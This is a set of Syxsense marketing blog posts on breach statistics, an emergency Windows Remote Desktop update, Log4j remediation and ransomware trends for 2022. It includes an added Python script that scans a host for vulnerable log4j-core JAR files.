  2. Hackers are finding easy pickings among both the business and consumer markets.

The list shows the USA far ahead of other western nations. With 212.4 million reported and confirmed account breaches, it leaves the UK (16.89 million) and Germany (10.3 million) in the dust. However, there are a couple of anomalies on the list. Iran and India placed second and third, respectively. But overall, it is clear that hackers tend to target the nations with the deepest pockets – hence, the position of the U.S.

Over the past year, accounts breached across the world as a whole jumped by 3.4%. One in five people globally were hacked. Yet the number of affected accounts in the U.S. grew at a much higher rate. It surged by 22%, jumping from 174.4 million to 212.4 million. That trend highlights the intention of hackers to go after the highest-value targets. The U.S. now accounts for almost a quarter of all accounts breached internationally.

Those hacked not only suffered financial damage from ransomware and loss of data. They also had to deal with reputational damage due to private data being stolen or leaked.

Securing the Enterprise

With hackers clearly targeting American accounts, both business and personal, security protections need to be stepped up. This means:

  1. Implementing standard security practices and technologies such as firewalls, intrusion prevention/detection, anti-virus, anti-malware, ransomware protection, security information and event management (SIEM), endpoint protection, and more.
  2. Protecting data via backups and disaster recovery systems. The organization must have the ability to retrieve backup files in the event of a breach or recover rapidly from a disaster or other event.
  3. Patching all organizational endpoints, devices, and servers to eliminate weaknesses that can be exploited by hackers.

Syxsense takes care of number 3. It automates the entire patch management process, prioritizing and deploying patches across the enterprise.

Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution. It also incorporates vulnerability scanning to detect weaknesses that could lead to a ransomware attack if unmitigated.


Windows Out-of-Band Update Released to Fix Remote Desktop

Microsoft has released an emergency security update to fix a Remote Desktop vulnerability in Windows Server running Remote Desktop.

Microsoft Issues Emergency Update for Remote Desktop

Microsoft has released an emergency security update to fix a Remote Desktop vulnerability on Windows Server systems running Remote Desktop. There is a known issue that might prevent you from using Remote Desktop to reach the server. In some circumstances, the server might stop responding. The screen might also appear black, and general performance and signing in might be slow.

Rob Brown, Head of Customer Success for Syxsense said, “This is not available via the usual Windows Update or Microsoft update channel / Windows Update for Business or Windows Server Update Service (WSUS), which can make resolving this vulnerability more difficult unless you are using a solution like Syxsense. Alternatively, you may download this patch manually via the Microsoft Catalogue.”

Windows Out-of-Band Updates

For instructions on how to install this update for your operating system, see the KB for your OS listed below:

As always, we recommend that full testing be performed prior to live deployment to your devices. These updates are now available within the Syxsense Console.


Are You Taking the Right Precautions Against the Log4j Flaw?

The number of attacks taking advantage of the Log4j zero-day flaw continues to grow. See the steps you should take to protect your business.

Some breaches are more serious than others. And the Log4j Java logging library attack is a doozy! Publicly disclosed in early December, the number of attacks taking advantage of this zero-day flaw continues to grow.

Known formally as CVE-2021-44228, the Log4j flaw makes remote code execution possible on, and grants access to, servers that use the Java logging library. Unfortunately, many are unaware that their enterprise systems use this Java library. They might hear the news and yet not realize it applies to them. Hence, the number of incursions has increased markedly in recent weeks despite heavy publicity.

While IT departments may be asleep at the wheel, hackers have been quick to jump on the Log4j bandwagon. In fact, some were already milking it for all it was worth only hours after it was publicly disclosed. Government sources said more than 100 attempts were made every minute utilizing the vulnerability. Cybersecurity firm Check Point believes that the flaw has been used in attempts to breach more than 40% of global networks.

Ubiquitous Java

What makes it so attractive is the ubiquitous nature of Java. Log4j, it turns out, is embedded in just about any and all Java-based products or web services out there – and that’s a lot! Thus, it is far from easy to remediate manually.

Meanwhile, hackers are unleashing hell on vulnerable systems. Some deliver cryptomining malware. Others use it to steal usernames and passwords to enable them to access networks and systems.

To make matters worse, the public disclosure of the exploit a couple of weeks ago is no guarantee that exploitation of Log4j is a new phenomenon. How long have attacks been quietly using it to burrow into enterprise systems? No one knows as yet.

Government Panic

Government agencies are in panic mode about Log4j. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), for example, ordered all civilian federal agencies to immediately patch this vulnerability as well as others such as Zoho’s Desktop Central Authentication Bypass vulnerability, Fortinet’s FortiOS Arbitrary File Download vulnerability and Realtek’s Jungle SDK Remote Code Execution vulnerability. CISA is working with multiple cybersecurity companies to shore up breached systems and protect other potential targets.

CISA Director Jen Easterly said this vulnerability poses a severe risk and noted it as being perhaps the most serious she has seen in her career. She urged enterprises to:

1. Enumerate any external facing devices that have Log4j installed.
2. Make sure that your security operations center is actioning every single alert on the devices that fall into the category above.
3. Install a web application firewall (WAF) with rules that automatically update so that your SOC is able to concentrate on fewer alerts.

However, Log4j is deeply embedded in many Java-based systems and may be difficult to find. It is even used in Supervisory Control and Data Acquisition (SCADA) and historian systems found across many industrial and infrastructure environments.
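To make step 1 above (enumerating where Log4j is installed) concrete on a single host, here is an added example, not from the original post or from Syxsense, that walks a directory tree for log4j-core JARs, reads each JAR's manifest version, and flags those that still ship the JndiLookup class below the fix version. The JARs it scans are constructed stand-ins, and the 2.15.0 threshold is an assumption to be aligned with current vendor guidance.

```python
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_MARKER = "org/apache/logging/log4j/core/Logger.class"
# Assumption: 2.15.0 first closed CVE-2021-44228; later advisories went higher, so follow vendor guidance.
FIXED_VERSION = (2, 15, 0)


def inspect_jar(path):
    """Return a finding dict for a log4j-core JAR, or None for any other file."""
    try:
        with zipfile.ZipFile(path) as z:
            names = set(z.namelist())
            if CORE_MARKER not in names:
                return None
            raw = z.read("META-INF/MANIFEST.MF") if "META-INF/MANIFEST.MF" in names else b""
    except (zipfile.BadZipFile, OSError):
        return None
    m = re.search(r"^Implementation-Version:\s*([\d.]+)", raw.decode("utf-8", "replace"), re.M)
    version = tuple(int(p) for p in m.group(1).split(".")) if m else None
    has_jndi = JNDI_CLASS in names
    # Fail closed: an unknown version that still ships JndiLookup counts as exposed.
    exposed = has_jndi and (version is None or version < FIXED_VERSION)
    return {"path": path, "version": version, "jndi_lookup": has_jndi, "exposed": exposed}


def scan(root):
    """Inspect every .jar under root; nested JARs inside WAR/EAR files are not descended."""
    paths = [os.path.join(d, n) for d, _, fs in os.walk(root) for n in sorted(fs) if n.lower().endswith(".jar")]
    return [f for f in map(inspect_jar, paths) if f]


def build_sample_jar(directory, version, with_jndi):
    """Constructed sample: a minimal stand-in for log4j-core, not a real Apache build."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        z.writestr(CORE_MARKER, b"")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"")
    return path


def demo():  # scan a temp directory holding one vulnerable and one patched sample JAR
    root = tempfile.mkdtemp()
    for version in ("2.14.1", "2.17.1"):
        build_sample_jar(root, version, with_jndi=True)
    return scan(root)
```

Run `scan("/")` (or the application roots of interest) to inventory a real host; the version check is only a first pass, so anything flagged should be confirmed against the vendor's advisory.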

Patching Log4j

Yes, Log4j may be difficult to patch. Yet patching remains the best defense against it. The UK’s National Cyber Security Centre (NCSC) made that fact quite clear. In an alert, it said:

“In the case of this vulnerability CVE-2021-44228, the most important aspect is to install the latest updates as soon as practicable.”

The good news is that the vendor community is responding rapidly to the threat. Vendors such as IBM, Cisco, and VMware have already released patches as many of their systems have been impacted by this bug. More vendors are releasing Log4j patches every day.

Start 2022 with the Best IT Security Strategy

This means that IT departments are likely to spend the start of 2022 on extensive patching of enterprise systems as they get back to work.

To avoid them becoming completely overwhelmed, they need the help of Syxsense. It will help them discover all impacted endpoints, test the released patches within three hours of receipt, and deploy them rapidly. Our automation features will save IT departments a great many hours, if not days.


Ransomware Predictions for 2022

In the IT world, a new year is the time to make predictions for the coming 12 months. How is ransomware looking to evolve in 2022?

The new year is traditionally a time to consider the future and set down new goals and directions for life. In the IT world, it is also a time to make predictions for the coming 12 months.

Let’s take a look at ransomware and how it is likely to evolve. What are the ransomware predictions for 2022?

1. More Ransomware

The European Union Agency for Cybersecurity’s latest ENISA Threat Landscape report saw a distinct rise in ransomware over the past year, and expects that trend to continue, and even accelerate in 2022. With a 150% rise in 2021, that doesn’t bode well for enterprises in the coming year.

2. More High-Profile Victims

2021 saw a series of high-profile victims of ransomware. These included Colonial Pipeline, Kronos, JBS, and Kaseya. SolarWinds could perhaps be added, but it began at the tail end of 2020.

This year expect an even longer list. Ransomware has become the primary security threat for businesses. Groups like DarkSide, REvil, and BlackMatter are not only terrorizing organizations, they are getting smarter and more organized.

According to an analysis by Kela, hacking groups have formulated the ideal U.S. victim:

  • Annual revenue of at least $100 million
  • Not from verticals such as education, government, healthcare or non-profits
  • Preferred access types are VPN, remote desktop protocol (RDP), and tools from Citrix, Palo Alto Networks, VMware, Fortinet, and Cisco.

Someone on the dark web can sell access to such companies for up to $100,000. That shows you just how lucrative this criminal enterprise can be. Expect an even longer ransomware “hall of shame” in 2022.

3. Ransomware Inc.

Ransomware has morphed from a few scruffy petty thieves operating out of a basement or attic apartment into a series of organized crime syndicates. Not only is there strength in numbers, there are economies of scale, as well as business advantages in developing a food chain and supply chain among cybercriminals.

These days, we have the lower levels pounding away via phishing emails and other scams, hoping to burrow into some juicy target. They, in turn, sell these leads and points of access to bigger fish and so it goes. There are even hacking development communities that create new viruses, trojans, and ransomware code. It’s getting sophisticated.

4. Multi-Vector Attacks

Yes, the bad guys want a ransom. But they have moved beyond being one-trick ponies. As well as money, they threaten reputations by publicizing attacks, blackmail companies by threatening to expose corporate or personal dirty laundry, or sell intellectual property (IP) to a competitor.

The smaller hackers and hacking groups will go after the small fish. But the more organized entities will target big fish and go after them in multiple ways.

5. Protection Money

Protection money used to be a simple thing. A couple of hoods would show up, and explain that your store could get robbed, or burned to the ground – that you needed protection. If you paid them, they could ensure those things didn’t happen to you. If you refused, they would beat you up, break some windows, or torch the premises – and then widely publicize the fact in the neighborhood to instill fear.

Those same tactics are now being expanded to the virtual world. Expect to hear more about organizations paying hacking groups to be left alone. If you don’t pay Luigi, the hacker, expect phishing to ramp up, ransomware demands to come thick and fast, and havoc to reign against the enterprise.

The Best Insurance

As these trends continue and accelerate, cyber-insurance is gaining momentum. But rates continue to climb. The best insurance against ransomware is to ensure that all systems and endpoints are adequately patched by Syxsense Secure.

Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution. It also incorporates vulnerability scanning to detect weaknesses that could lead to a ransomware attack if unmitigated.
